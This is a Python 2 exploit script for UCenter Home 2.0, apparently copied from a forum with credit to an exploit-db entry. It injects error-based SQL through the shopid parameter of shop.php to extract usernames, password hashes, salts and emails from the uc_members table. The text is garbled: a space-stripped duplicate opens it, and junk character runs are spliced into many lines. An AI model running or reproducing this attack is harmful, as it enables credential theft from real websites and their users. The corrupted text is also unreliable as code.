UCenter Home 2.0 EXP

admin

#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
/ @5 I2 C2 F8 k, G% F

#!/usr/bin/env python  

import sys  
import urllib2  
import re  

def info():  
    print 'From:http://www.exploit-db.com/exploits/14997/'
( T- R, L# L, o5 w3 W/ p8 N6 a- V    print 'http://www.hake.cc/Web_loudong/'
3 u$ a9 r# ]7 V- m0 |+ ?+ i  A5 ~    print 'changed:qiaoy'  
1 c  j" Y) [2 n5 K& Z0 @    print 'exp:'  
, C0 x4 `) p' a# T- g    print ' ./UCenter_Home_2.0.py site'  
0 `7 q! Z7 i6 Z. o
0 k; q8 W% c6 X$ Vdef main():  
    if len(sys.argv) != 2:  
        info()  
    else:  
        site = sys.argv[1]  
        if site[0:7] == 'http://':  
            sitesite =site  
        elif site[0:8] == 'https://':  
            sitesite = site  
        else:  
            site = 'http://'+site  
        try:  
$ d9 a3 a+ _9 F            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
' F0 \: L, L+ J/ z- y7 ?            Value = urllib2.urlopen(url).read()  
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
            hacked = Msg.split(':')  
            print 'Name:    '+hacked[1]  
            print 'Passwd:  '+hacked[2]  
            print 'salt:    '+hacked[3]  
. ^! S; I/ V7 ^            print 'email:   '+hacked[4]  
' X/ d+ y; e2 B& O- ?% W3 ^  \        except:  
7 d5 t" {$ `2 {/ `" Q* t            print 'Sorry,I can\'t work............'  
! i- y, R; n" S% @0 H$ d8 I
if __name__ == '__main__':  
    main()